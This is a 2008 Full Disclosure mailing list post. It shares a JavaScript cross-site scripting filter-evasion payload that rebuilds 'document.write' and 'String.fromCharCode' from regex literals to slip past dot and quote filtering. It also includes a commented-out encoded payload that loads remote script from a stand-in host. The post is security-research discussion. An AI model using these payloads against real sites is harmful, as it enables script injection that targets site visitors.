Full Disclosure mailing list archives
xss dot(.) filter evasion
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Wed, 18 Jun 2008 17:49:59 +0200
Hello, I came across this site that implemented some filtering so the dots were replaced by an underscore, also the quotes and backslash were escaped. I came up with the code below to bypass this filtering (write anything to the page using String.fromCharCode) Someone knows a different way to do this? <html> <head> <title> </title> </head> <body> <script> function write(str){ //document.write() doesn't work as it becomes document_write() var s = /write/; var w = String(); var n = String(); w += s; //cast to string so we can index w += s; n += w[1] + w[2] + w[3] + w[4] + w[5]; //call document['write'] document[n](str); } var s = /fromCharCode/; var w = String(); var n = String(); w += s; n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] + w[11] + w[12]; write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47, 62,104,60,47,97,62)); /* write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99 ,111,109,34,62)); */ </script> </body> </html> Regards, Thoms Pollet
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- xss dot(.) filter evasion Thomas Pollet (Jun 18)
- Re: xss dot(.) filter evasion Thomas Pollet (Jun 18)
- Re: xss dot(.) filter evasion Andrew Farmer (Jun 18)
- Re: xss dot(.) filter evasion Thomas Pollet (Jun 19)